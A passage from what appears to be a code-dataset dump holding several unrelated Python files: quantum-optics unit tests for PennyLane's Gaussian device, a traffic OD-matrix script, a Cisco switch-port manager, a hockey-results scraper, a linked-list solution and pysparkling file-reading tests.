a2out.imag])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_two_mode_squeezing(self):\r\n \"\"\"Test the two mode squeezing symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n r = 0.543\r\n phi = 0.123\r\n S = two_mode_squeezing(r, phi)\r\n\r\n # test that S = B^\\dagger(pi/4, 0) [S(z) x S(-z)] B(pi/4)\r\n B = beamsplitter(np.pi/4, 0)\r\n Sz = block_diag(squeezing(r, phi), squeezing(-r, phi))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n expected = B.conj().T @ Sz @ B\r\n self.assertAllAlmostEqual(S, expected, delta=self.tol)\r\n\r\n # test that S |a1, a2> = |ta1+ra2, ta2+ra1>\r\n a1 = 0.23+0.12j\r\n a2 = 0.23+0.12j\r\n out = S @ np.array([a1.real, a2.real, a1.imag, a2.imag])*np.sqrt(2*hbar)\r\n\r\n T = np.cosh(r)\r\n R = np.exp(1j*phi)*np.sinh(r)\r\n a1out = T*a1 + R*np.conj(a2)\r\n a2out = T*a2 + R*np.conj(a1)\r\n expected = np.array([a1out.real, a2out.real, a1out.imag, a2out.imag])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_controlled_addition(self):\r\n \"\"\"Test the CX symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n s = 0.543\r\n S = controlled_addition(s)\r\n\r\n # test that S = B(theta+pi/2, 0) [S(z) x S(-z)] B(theta, 0)\r\n r = np.arcsinh(-s/2)\r\n theta = 0.5*np.arctan2(-1/np.cosh(r), -np.tanh(r))\r\n Sz = block_diag(squeezing(r, 0), squeezing(-r, 0))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n\r\n expected = beamsplitter(theta+np.pi/2, 0) @ Sz @ beamsplitter(theta, 0)\r\n self.assertAllAlmostEqual(S, expected, delta=self.tol)\r\n\r\n # test that S[x1, x2, p1, p2] -> [x1, x2+sx1, p1-sp2, p2]\r\n x1 = 0.5432\r\n x2 = -0.453\r\n p1 = 0.154\r\n p2 = -0.123\r\n out = S @ np.array([x1, x2, p1, p2])*np.sqrt(2*hbar)\r\n expected = np.array([x1, x2+s*x1, p1-s*p2, p2])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_controlled_phase(self):\r\n \"\"\"Test the CZ symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n s = 0.543\r\n S = controlled_phase(s)\r\n\r\n # test that S = R_2(pi/2) CX(s) R_2(pi/2)^\\dagger\r\n R2 = block_diag(np.identity(2), rotation(np.pi/2))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n expected = R2 @ controlled_addition(s) @ R2.conj().T\r\n self.assertAllAlmostEqual(S, expected, delta=self.tol)\r\n\r\n # test that S[x1, x2, p1, p2] -> [x1, x2, p1+sx2, p2+sx1]\r\n x1 = 0.5432\r\n x2 = -0.453\r\n p1 = 0.154\r\n p2 = -0.123\r\n out = S @ np.array([x1, x2, p1, p2])*np.sqrt(2*hbar)\r\n expected = np.array([x1, x2, p1+s*x2, p2+s*x1])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n\r\nclass TestStates(BaseTest):\r\n \"\"\"State tests.\"\"\"\r\n\r\n def test_vacuum_state(self):\r\n \"\"\"Test the vacuum state is correct.\"\"\"\r\n self.logTestName()\r\n wires = 3\r\n means, cov = vacuum_state(wires, hbar=hbar)\r\n self.assertAllAlmostEqual(means, np.zeros([2*wires]), delta=self.tol)\r\n self.assertAllAlmostEqual(cov, np.identity(2*wires)*hbar/2, delta=self.tol)\r\n\r\n def test_coherent_state(self):\r\n \"\"\"Test the coherent state is correct.\"\"\"\r\n self.logTestName()\r\n a = 0.432-0.123j\r\n means, cov = coherent_state(a, hbar=hbar)\r\n self.assertAllAlmostEqual(means, np.array([a.real, a.imag])*np.sqrt(2*hbar), delta=self.tol)\r\n self.assertAllAlmostEqual(cov, np.identity(2)*hbar/2, delta=self.tol)\r\n\r\n def test_squeezed_state(self):\r\n \"\"\"Test the squeezed state is correct.\"\"\"\r\n self.logTestName()\r\n r = 0.432\r\n phi = 0.123\r\n means, cov = squeezed_state(r, phi, hbar=hbar)\r\n\r\n # test vector of means is zero\r\n self.assertAllAlmostEqual(means, np.zeros([2]), delta=self.tol)\r\n\r\n R = rotation(phi/2)\r\n expected = R @ np.array([[np.exp(-2*r), 0],\r\n [0, np.exp(2*r)]]) * hbar/2 @ R.T\r\n # test covariance matrix is correct\r\n self.assertAllAlmostEqual(cov, expected, delta=self.tol)\r\n\r\n def test_displaced_squeezed_state(self):\r\n \"\"\"Test the displaced squeezed state is correct.\"\"\"\r\n self.logTestName()\r\n alpha = 0.541+0.109j\r\n a = abs(alpha)\r\n phi_a = np.angle(alpha)\r\n r = 0.432\r\n phi_r = 0.123\r\n means, cov = displaced_squeezed_state(a, phi_a, r, phi_r, hbar=hbar)\r\n\r\n # test vector of means is correct\r\n self.assertAllAlmostEqual(means, np.array([alpha.real, alpha.imag])*np.sqrt(2*hbar), delta=self.tol)\r\n\r\n R = rotation(phi_r/2)\r\n expected = R @ np.array([[np.exp(-2*r), 0],\r\n [0, np.exp(2*r)]]) * hbar/2 @ R.T\r\n # test covariance matrix is correct\r\n self.assertAllAlmostEqual(cov, expected, delta=self.tol)\r\n\r\n def thermal_state(self):\r\n \"\"\"Test the thermal state is correct.\"\"\"\r\n self.logTestName()\r\n nbar = 0.5342\r\n means, cov = thermal_state(nbar, hbar=hbar)\r\n self.assertAllAlmostEqual(means, np.zeros([2]), delta=self.tol)\r\n self.assertTrue(np.all((cov.diag*2/hbar-1)/2 == nbar))\r\n\r\n\r\n\r\nclass TestDefaultGaussianDevice(BaseTest):\r\n \"\"\"Test the default gaussian device. The test ensures that the device is properly\r\n applying gaussian operations and calculating the correct observables.\"\"\"\r\n def setUp(self):\r\n self.dev = DefaultGaussian(wires=2, shots=0, hbar=hbar)\r\n\r\n def test_operation_map(self):\r\n \"\"\"Test that default Gaussian device supports all PennyLane Gaussian CV gates.\"\"\"\r\n self.logTestName()\r\n\r\n non_supported = {'FockDensityMatrix',\r\n 'FockStateVector',\r\n 'FockState',\r\n 'CrossKerr',\r\n 'CatState',\r\n 'CubicPhase',\r\n 'Kerr'}\r\n\r\n self.assertEqual(set(qml.ops.cv.__all__) - non_supported,\r\n set(self.dev._operation_map))\r\n\r\n def test_expectation_map(self):\r\n \"\"\"Test that default Gaussian device supports all PennyLane Gaussian continuous expectations.\"\"\"\r\n self.logTestName()\r\n self.assertEqual(set(qml.expval.cv.__all__)|{'Identity'}-{'Heterodyne'},\r\n set(self.dev._expectation_map))\r\n\r\n def test_apply(self):\r\n \"\"\"Test the application of gates to a state\"\"\"\r\n self.logTestName()\r\n\r\n # loop through all supported operations\r\n for gate_name, fn in self.dev._operation_map.items():\r\n log.debug(\"\\tTesting %s gate...\", gate_name)\r\n self.dev.reset()\r\n\r\n # start in the displaced squeezed state\r\n alpha = 0.542+0.123j\r\n a = abs(alpha)\r\n phi_a = np.angle(alpha)\r\n r = 0.652\r\n phi_r = -0.124\r\n\r\n self.dev.apply('DisplacedSqueezedState', wires=[0], par=[a, phi_a, r, phi_r])\r\n self.dev.apply('DisplacedSqueezedState', wires=[1], par=[a, phi_a, r, phi_r])\r\n\r\n # get the equivalent pennylane operation class\r\n op = qml.ops.__getattribute__(gate_name)\r\n # the list of wires to apply the operation to\r\n w = list(range(op.num_wires))\r\n\r\n if op.par_domain == 'A':\r\n # the parameter is an array\r\n if gate_name == 'GaussianState':\r\n p = [np.array([0.432, 0.123, 0.342, 0.123]), np.diag([0.5234]*4)]\r\n w = list(range(2))\r\n expected_out = p\r\n elif gate_name == 'Interferometer':\r\n w = list(range(2))\r\n p = [U]\r\n S = fn(*p)\r\n expected_out = S @ self.dev._state[0], S @ self.dev._state[1] @ S.T\r\n else:\r\n # the parameter is a float\r\n p = [0.432423, -0.12312, 0.324, 0.751][:op.num_params]\r\n\r\n if gate_name == 'Displacement':\r\n alpha = p[0]*np.exp(1j*p[1])\r\n state = self.dev._state\r\n mu = state[0].copy()\r\n mu[w[0]] += alpha.real*np.sqrt(2*hbar)\r\n mu[w[0]+2] += alpha.imag*np.sqrt(2*hbar)\r\n expected_out = mu, state[1]\r\n elif 'State' in gate_name:\r\n mu, cov = fn(*p, hbar=hbar)\r\n expected_out = self.dev._state\r\n expected_out[0][[w[0], w[0]+2]] = mu\r\n\r\n ind = np.concatenate([np.array([w[0]]), np.array([w[0]])+2])\r\n rows = ind.reshape(-1, 1)\r\n cols = ind.reshape(1, -1)\r\n expected_out[1][rows, cols] = cov\r\n else:\r\n # if the default.gaussian is an operation accepting parameters,\r\n # initialise it using the parameters generated above.\r\n S = fn(*p)\r\n\r\n # calculate the expected output\r\n if op.num_wires == 1:\r\n # reorder from symmetric ordering to xp-ordering\r\n S = block_diag(S, np.identity(2))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n\r\n expected_out = S @ self.dev._state[0], S @ self.dev._state[1] @ S.T\r\n\r\n self.dev.apply(gate_name, wires=w, par=p)\r\n\r\n # verify the device is now in the expected state\r\n self.assertAllAlmostEqual(self.dev._state[0], expected_out[0], delta=self.tol)\r\n self.assertAllAlmostEqual(self.dev._state[1], expected_out[1], delta=self.tol)\r\n\r\n def test_apply_errors(self):\r\n \"\"\"Test that apply fails for incorrect state preparation\"\"\"\r\n self.logTestName()\r\n\r\n with self.assertRaisesRegex(ValueError, 'incorrect size for the number of subsystems'):\r\n p = [thermal_state(0.5)]\r\n self.dev.apply('GaussianState', wires=[0], par=[p])\r\n\r\n with self.assertRaisesRegex(ValueError, 'Incorrect number of subsystems'):\r\n p = U\r\n self.dev.apply('Interferometer', wires=[0], par=[p])\r\n\r\n with self.assertRaisesRegex(ValueError, \"Invalid target subsystems provided in 'wires' argument\"):\r\n p = U2\r\n dev = DefaultGaussian(wires=4, shots=0, hbar=hbar)\r\n self.dev.apply('Interferometer', wires=[0, 1, 2], par=[p])\r\n\r\n def test_expectation(self):\r\n \"\"\"Test that expectation values are calculated correctly\"\"\"\r\n self.logTestName()\r\n\r\n dev = qml.device('default.gaussian', wires=1, hbar=hbar)\r\n\r\n # test correct mean and variance for of a displaced thermal state\r\n nbar = 0.5431\r\n alpha = 0.324-0.59j\r\n dev.apply('ThermalState', wires=[0], par=[nbar])\r\n dev.apply('Displacement', wires=[0], par=[alpha, 0])\r\n mean = dev.expval('MeanPhoton', [0], [])\r\n self.assertAlmostEqual(mean, np.abs(alpha)**2+nbar, delta=self.tol)\r\n # self.assertAlmostEqual(var, nbar**2+nbar+np.abs(alpha)**2*(1+2*nbar), delta=self.tol)\r\n\r\n # test correct mean and variance for Homodyne P measurement\r\n alpha = 0.324-0.59j\r\n dev.apply('CoherentState', wires=[0], par=[alpha])\r\n mean = dev.expval('P', [0], [])\r\n self.assertAlmostEqual(mean, alpha.imag*np.sqrt(2*hbar), delta=self.tol)\r\n # self.assertAlmostEqual(var, hbar/2, delta=self.tol)\r\n\r\n # test correct mean and variance for Homodyne measurement\r\n mean = dev.expval('Homodyne', [0], [np.pi/2])\r\n self.assertAlmostEqual(mean, alpha.imag*np.sqrt(2*hbar), delta=self.tol)\r\n # self.assertAlmostEqual(var, hbar/2, delta=self.tol)\r\n\r\n # test correct mean and variance for number state expectation ||^2\r\n # on a coherent state\r\n for n in range(3):\r\n mean = dev.expval('NumberState', [0], [np.array([n])])\r\n expected = np.abs(np.exp(-np.abs(alpha)**2/2)*alpha**n/np.sqrt(fac(n)))**2\r\n self.assertAlmostEqual(mean, expected, delta=self.tol)\r\n\r\n # test correct mean and variance for number state expectation ||^2\r\n # on a squeezed state\r\n n = 1\r\n r = 0.4523\r\n dev.apply('SqueezedState', wires=[0], par=[r, 0])\r\n mean = dev.expval('NumberState', [0], [np.array([2*n])])\r\n expected = np.abs(np.sqrt(fac(2*n))/(2**n*fac(n))*(-np.tanh(r))**n/np.sqrt(np.cosh(r)))**2\r\n self.assertAlmostEqual(mean, expected, delta=self.tol)\r\n\r\n def test_reduced_state(self):\r\n \"\"\"Test reduced state\"\"\"\r\n self.logTestName()\r\n\r\n # Test error is raised if requesting a non-existant subsystem\r\n with self.assertRaisesRegex(ValueError, \"specified wires cannot be larger than the number of subsystems\"):\r\n self.dev.reduced_state([6, 4])\r\n\r\n # Test requesting via an integer\r\n res = self.dev.reduced_state(0)\r\n expected = self.dev.reduced_state([0])\r\n self.assertAllAlmostEqual(res[0], expected[0], delta=self.tol)\r\n self.assertAllAlmostEqual(res[1], expected[1], delta=self.tol)\r\n\r\n # Test requesting all wires returns the full state\r\n res = self.dev.reduced_state([0, 1])\r\n expected = self.dev._state\r\n self.assertAllAlmostEqual(res[0], expected[0], delta=self.tol)\r\n self.assertAllAlmostEqual(res[1], expected[1], delta=self.tol)\r\n\r\n\r\nclass TestDefaultGaussianIntegration(BaseTest):\r\n \"\"\"Integration tests for default.gaussian. This test ensures it integrates\r\n properly with the PennyLane interface, in particular QNode.\"\"\"\r\n\r\n def test_load_default_gaussian_device(self):\r\n \"\"\"Test that the default plugin loads correctly\"\"\"\r\n self.logTestName()\r\n\r\n dev = qml.device('default.gaussian', wires=2, hbar=2)\r\n self.assertEqual(dev.num_wires, 2)\r\n self.assertEqual(dev.shots, 0)\r\n self.assertEqual(dev.hbar, 2)\r\n self.assertEqual(dev.short_name, 'default.gaussian')\r\n\r\n def test_args(self):\r\n \"\"\"Test that the plugin requires correct arguments\"\"\"\r\n self.logTestName()\r\n\r\n with self.assertRaisesRegex(TypeError, \"missing 1 required positional argument: 'wires'\"):\r\n qml.device('default.gaussian')\r\n\r\n def test_unsupported_gates(self):\r\n \"\"\"Test error is raised with unsupported gates\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=2)\r\n\r\n gates = set(dev._operation_map.keys())\r\n all_gates = {m[0] for m in inspect.getmembers(qml.ops, inspect.isclass)}\r\n\r\n for g in all_gates - gates:\r\n op = getattr(qml.ops, g)\r\n\r\n if op.num_wires == 0:\r\n wires = [0]\r\n else:\r\n wires = list(range(op.num_wires))\r\n\r\n @qml.qnode(dev)\r\n def circuit(*x):\r\n \"\"\"Test quantum function\"\"\"\r\n x = prep_par(x, op)\r\n op(*x, wires=wires)\r\n\r\n if issubclass(op, qml.operation.CV):\r\n return qml.expval.X(0)\r\n\r\n return qml.expval.PauliZ(0)\r\n\r\n with self.assertRaisesRegex(qml.DeviceError, \"Gate {} not supported on device default.gaussian\".format(g)):\r\n x = np.random.random([op.num_params])\r\n circuit(*x)\r\n\r\n def test_unsupported_observables(self):\r\n \"\"\"Test error is raised with unsupported observables\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=2)\r\n\r\n obs = set(dev._expectation_map.keys())\r\n all_obs = set(qml.expval.__all__)\r\n\r\n for g in all_obs - obs:\r\n op = getattr(qml.expval, g)\r\n\r\n if op.num_wires == 0:\r\n wires = [0]\r\n else:\r\n wires = list(range(op.num_wires))\r\n\r\n @qml.qnode(dev)\r\n def circuit(*x):\r\n \"\"\"Test quantum function\"\"\"\r\n x = prep_par(x, op)\r\n return op(*x, wires=wires)\r\n\r\n with self.assertRaisesRegex(qml.DeviceError, \"Expectation {} not supported on device default.gaussian\".format(g)):\r\n x = np.random.random([op.num_params])\r\n circuit(*x)\r\n\r\n def test_gaussian_circuit(self):\r\n \"\"\"Test that the default gaussian plugin provides correct result for simple circuit\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=1)\r\n\r\n p = 0.543\r\n\r\n @qml.qnode(dev)\r\n def circuit(x):\r\n \"\"\"Test quantum function\"\"\"\r\n qml.Displacement(x, 0, wires=0)\r\n return qml.expval.X(0)\r\n\r\n self.assertAlmostEqual(circuit(p), p*np.sqrt(2*hbar), delta=self.tol)\r\n\r\n def test_gaussian_identity(self):\r\n \"\"\"Test that the default gaussian plugin provides correct result for the identity expectation\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=1)\r\n\r\n p = 0.543\r\n\r\n @qml.qnode(dev)\r\n def circuit(x):\r\n \"\"\"Test quantum function\"\"\"\r\n qml.Displacement(x, 0, wires=0)\r\n return qml.expval.Identity(0)\r\n\r\n self.assertAlmostEqual(circuit(p), 1, delta=self.tol)\r\n\r\n def test_nonzero_shots(self):\r\n \"\"\"Test that the default gaussian plugin provides correct result for high shot number\"\"\"\r\n self.logTestName()\r\n\r\n shots = 10**4\r\n dev = qml.device('default.gaussian', wires=1, shots=shots)\r\n\r\n p = 0.543\r\n\r\n @qml.qnode(dev)\r\n def circuit(x):\r\n \"\"\"Test quantum function\"\"\"\r\n qml.Displacement(x, 0, wires=0)\r\n return qml.expval.X(0)\r\n\r\n runs = []\r\n for _ in range(100):\r\n runs.append(circuit(p))\r\n\r\n self.assertAlmostEqual(np.mean(runs), p*np.sqrt(2*hbar), delta=0.01)\r\n\r\n def test_supported_gates(self):\r\n \"\"\"Test that all supported gates work correctly\"\"\"\r\n self.logTestName()\r\n a = 0.312\r\n\r\n dev = qml.device('default.gaussian', wires=2)\r\n\r\n for g, qop in dev._operation_map.items():\r\n log.debug('\\tTesting gate %s...', g)\r\n self.assertTrue(dev.supported(g))\r\n dev.reset()\r\n\r\n op = getattr(qml.ops, g)\r\n if op.num_wires == 0:\r\n wires = list(range(2))\r\n else:\r\n wires = list(range(op.num_wires))\r\n\r\n @qml.qnode(dev)\r\n def circuit(*x):\r\n \"\"\"Reference quantum function\"\"\"\r\n qml.Displacement(a, 0, wires=[0])\r\n op(*x, wires=wires)\r\n return qml.expval.X(0)\r\n\r\n # compare to reference result\r\n def reference(*x):\r\n \"\"\"reference circuit\"\"\"\r\n if g == 'GaussianState':\r\n return x[0][0]\r\n\r\n if g == 'Displacement':\r\n alpha = x[0]*np.exp(1j*x[1])\r\n return (alpha+a).real*np.sqrt(2*hbar)\r\n\r\n if 'State' in g:\r\n mu, _ = qop(*x, hbar=hbar)\r\n return mu[0]\r\n\r\n S = qop(*x)\r\n\r\n # calculate the expected output\r\n if op.num_wires == 1:\r\n S = block_diag(S, np.identity(2))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n\r\n return (S @ np.array([a.real, a.imag, 0, 0])*np.sqrt(2*hbar))[0]\r\n\r\n if g == 'GaussianState':\r\n p = [np.array([0.432, 0.123, 0.342, 0.123]), np.diag([0.5234]*4)]\r\n elif g == 'Interferometer':\r\n p = [np.array(U)]\r\n else:\r\n p = [0.432423, -0.12312, 0.324, 0.763][:op.num_params]\r\n\r\n self.assertAllEqual(circuit(*p), reference(*p))\r\n\r\n\r\nif __name__ == '__main__':\r\n print('Testing PennyLane version ' + qml.version() + ', default.gaussian plugin.')\r\n # run the tests in this file\r\n suite = unittest.TestSuite()\r\n for t in (TestAuxillaryFunctions,\r\n TestGates,\r\n TestStates,\r\n TestDefaultGaussianDevice,\r\n TestDefaultGaussianIntegration):\r\n ttt = unittest.TestLoader().loadTestsFromTestCase(t)\r\n suite.addTests(ttt)\r\n unittest.TextTestRunner().run(suite)\r\n","sub_path":"tests/test_default_gaussian.py","file_name":"test_default_gaussian.py","file_ext":"py","file_size_in_byte":26165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"63861039","text":"#New OD MATRIX\r\n#this script requires a network_v4.json file, this one is automatically created when the network3 script is run to create the network\r\nimport json\r\nimport os\r\nfilename = os.path.join(\"D:\\jcdoig\\gridlock\", 'Network_v4.json')\r\n\r\njson_data=open(filename)\r\ninter = json.load(json_data)\r\njson_data.close()\r\n\r\n\r\ndef NewGKODMatrix(GKCentroidConfiguration, name = \"New OD Matrix with internal and external\"):\r\n\tGKODMatrix = GKSystem.getSystem().newObject( \"GKODMatrix\", model )\r\n\tGKODMatrix.setName( name )\r\n\tGKODMatrix.setCentroidConfiguration(GKCentroidConfiguration)\r\n\treturn GKODMatrix\r\n\r\nnewODMatrix = NewGKODMatrix(target)\r\nnewODMatrix.setEnableStore(True)\r\ntarget.addODMatrix(newODMatrix)\r\n\r\nrownum = len(inter) - 2\r\ncolnum = len(inter[0]) - 2\r\nitrips = 10\r\n\r\nfor ro in range(0, rownum + 2 ):\r\n\tfor co in range(0, colnum + 2 ):\r\n\t\tfor rd in range(0, rownum + 2 ):\r\n\t\t\tfor cd in range(0, colnum + 2 ):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tif (inter[ro][co][\"internal?\"] and inter[ro][co][\"O/D\"]):\r\n\t\t\t\t\t\tif (inter[rd][cd][\"internal?\"] and inter[rd][cd][\"O/D\"]):\r\n\t\t\t\t\t\t\tif (inter[ro][co][\"GKCentroid\"] != inter[rd][cd][\"GKCentroid\"]):\r\n\t\t\t\t\t\t\t\tnewODMatrix.setTrips(model.getCatalog().find(inter[ro][co][\"GKCentroid\"]), model.getCatalog().find(inter[rd][cd][\"GKCentroid\"]), itrips)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass","sub_path":"create_new_od.py","file_name":"create_new_od.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236101642","text":"#!/bin/env python\nfrom modules.portstate import *\nfrom modules.host import *\nfrom modules.dbinit import *\nfrom modules.datevalidator import *\nfrom modules.logger import *\nimport argparse\n\ndef run(*args, **kwargs):\n arguments = args[0]\n action = arguments['action']\n\n if not arguments['ignore_holiday']:\n if DateValidator.is_holiday() or DateValidator.is_weekend():\n Logger.log(\"Today is weekend or holiday. Do nothing.\")\n return None\n\n if arguments['init']:\n init(arguments['hosts'])\n return None\n\n if arguments['hosts']:\n hosts = arguments['hosts']\n else:\n hosts = get_host_list()\n\n # Run main procedure\n for hostname in hosts:\n host = Host(hostname)\n\n if arguments['hosts']: # if ports explicitly set - use it. Here ports can be either list or int\n ports = arguments['ports']\n else:\n host_db = DatabaseInit()\n host_info = host_db.collect_data_from_host(host)\n ports_number = host_info['ports_no'] # get ports number from hardware\n ports = ports_generator(ports_number)\n\n port_switcher(host, ports, action)\n\ndef init(hostnames):\n host_db = DatabaseInit(hostnames)\n host_db.initiate_db()\n return None\n\ndef ports_generator(ports):\n \"\"\" Takes Int as input \"\"\"\n\n return [port for port in range(1, ports_number + 1)]\n\ndef port_switcher(host, ports, action=None):\n for port in ports:\n portmanager = PortState(host, port, force=action) # Up, Down\n portmanager.switch()\n\ndef get_host_list():\n \"\"\" Return clean hostnames \"\"\"\n\n db_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), \"db\", \"network\"))\n db_files = [ x[:6] for x in os.listdir(db_path) if \"L00\" in x ] # get clean hostnames\n return db_files\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-n','--hosts', nargs=\"*\", dest=\"hosts\", help=\"Set hostnames: [HOST] [HOST] ... \")\n parser.add_argument('-p','--ports', nargs=\"*\", dest=\"ports\", help=\"Set ports: [PORT] [PORT] ... \")\n parser.add_argument('-a','--action', dest=\"action\", help=\"Set action [Up/Down]\")\n parser.add_argument('-i','--init', action=\"store_true\", dest=\"init\", help=\"Initialise database L00XXX.json\")\n parser.add_argument('--ignore-holiday', action=\"store_true\", dest=\"ignore_holiday\", help=\"Run regardless of the holiday or weekend.\")\n\n args = parser.parse_args()\n parameters = vars(args)\n #print parameters\n\n run(parameters)\n","sub_path":"cisco_port_manager.py","file_name":"cisco_port_manager.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"477486956","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# untitled.py\n# \n# Copyright 2013 Martin \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport re\n\n#def fix_style(seed):\n#\tstring = ''\n#\tfor i in seed:\n#\t\tstring.append(str(i).strip('[]'))\n#\t\t\n#\treturn string\n\t\t\n\npage = urllib2.urlopen('http://stats.swehockey.se/ScheduleAndResults/Live/3005').read()\nsoup = BeautifulSoup(page)\nsoup.prettify()\n\ngames = soup.find_all(\"b\")\nmatches = soup.b.get_text()\n\n\nresult = []\nfor text in games:\n\tgame = text, str(text.find_next(\"a\").string)\n\tresult.append(game)\n\nfor i in result:\n\tfor p in i:\n\t\tprint(p)\n\t\n#fixed = fix_style(result)\n\nprint(result)","sub_path":"result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"648125293","text":"# https://leetcode.com/problems/reorder-list/\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if not (head and head.next):\n return\n slow = head\n fast = head.next\n ln = 1\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n ln += 1\n if not fast.next:\n ln = 2*ln\n else:\n slow = slow.next\n ln = 2*ln + 1\n if ln == 2:\n return\n # now slow is as mid of the list\n half2 = slow.next\n slow.next = None\n # reverse the second half\n if half2.next:\n temp1 = half2.next\n half2.next = None\n while temp1 and temp1.next:\n temp2 = temp1.next\n temp1.next = half2\n half2 = temp1\n temp1 = temp2\n temp1.next = half2\n half2 = temp1\n # merge the two lists\n temp1 = head\n temp2 = half2\n while temp1 and temp2:\n half2 = half2.next\n temp2.next = temp1.next\n temp1.next = temp2\n temp1 = temp2.next\n temp2 = half2\n \n","sub_path":"Algo/python/ReorderList.py","file_name":"ReorderList.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203341021","text":"import os\nimport logging\nimport tempfile\nfrom pysparkling import Context\n\n\ndef test_local_textFile_1():\n lines = Context().textFile('tests/*textFil*.py').collect()\n print(lines)\n assert 'from pysparkling import Context' in lines\n\n\ndef test_local_textFile_2():\n line_count = Context().textFile('tests/*.py').count()\n print(line_count)\n assert line_count > 90\n\n\ndef test_local_textFile_name():\n name = Context().textFile('tests/*.py').name()\n print(name)\n assert name == 'tests/*.py'\n\n\ndef test_s3_textFile():\n if not os.getenv('AWS_ACCESS_KEY_ID'):\n return\n\n myrdd = Context().textFile(\n 's3n://aws-publicdatasets/common-crawl/crawl-data/'\n 'CC-MAIN-2015-11/warc.paths.*'\n )\n assert (\n 'common-crawl/crawl-data/CC-MAIN-2015-11/segments/1424937481488.49/'\n 'warc/CC-MAIN-20150226075801-00329-ip-10-28-5-156.ec2.'\n 'internal.warc.gz' in myrdd.collect()\n )\n\n\ndef test_http_textFile():\n myrdd = Context().textFile(\n 'https://s3-us-west-2.amazonaws.com/human-microbiome-project/DEMO/'\n 'HM16STR/46333/by_subject/1139.fsa'\n )\n assert u'TGCTGCGGTGAATGCGTTCCCGGGTCT' in myrdd.collect()\n\n\ndef test_saveAsTextFile():\n tempFile = tempfile.NamedTemporaryFile(delete=True)\n tempFile.close()\n Context().parallelize(range(10)).saveAsTextFile(tempFile.name)\n with open(tempFile.name+'/part-00000', 'r') as f:\n r = f.readlines()\n print(r)\n assert '5\\n' in r\n\n\ndef test_saveAsTextFile_gz():\n tempFile = tempfile.NamedTemporaryFile(delete=True)\n tempFile.close()\n Context().parallelize(range(10)).saveAsTextFile(tempFile.name+'.gz')\n read_rdd = Context().textFile(tempFile.name+'.gz')\n assert '5' in read_rdd.collect()\n\n\ndef test_saveAsTextFile_bz2():\n tempFile = tempfile.NamedTemporaryFile(delete=True)\n tempFile.close()\n Context().parallelize(range(10)).saveAsTextFile(tempFile.name+'.bz2')\n read_rdd = Context().textFile(tempFile.name+'.bz2')\n assert '5' in read_rdd.collect()\n\n\ndef test_pyspark_compatibility_txt():\n kv = Context().textFile('tests/pyspark/key_value.txt').collect()\n print(kv)\n assert u\"('a', 1)\" in kv and u\"('b', 2)\" in kv and len(kv) == 2\n\n\ndef test_pyspark_compatibility_bz2():\n kv = Context().textFile('tests/pyspark/key_value.txt.bz2').collect()\n print(kv)\n assert u\"a\\t1\" in kv and u\"b\\t2\" in kv and len(kv) == 2\n\n\ndef test_pyspark_compatibility_gz():\n kv = Context().textFile('tests/pyspark/key_value.txt.gz').collect()\n print(kv)\n assert u\"a\\t1\" in kv and u\"b\\t2\" in kv and len(kv) == 2\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n # test_saveAsTextFile()\n # test_local_textFile_2()\n # test_saveAsTextFile_gz()\n # test_s3_textFile()\n test_http_textFile()\n # test_pyspark_compatibility_txt()\n # test_pyspark_compatibility_gz()\n # test_pyspark_compatibility_bz2()\n","sub_path":"tests/test_textFile.py","file_name":"test_textFile.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221175917","text":"\"\"\"\r\nAuthor: 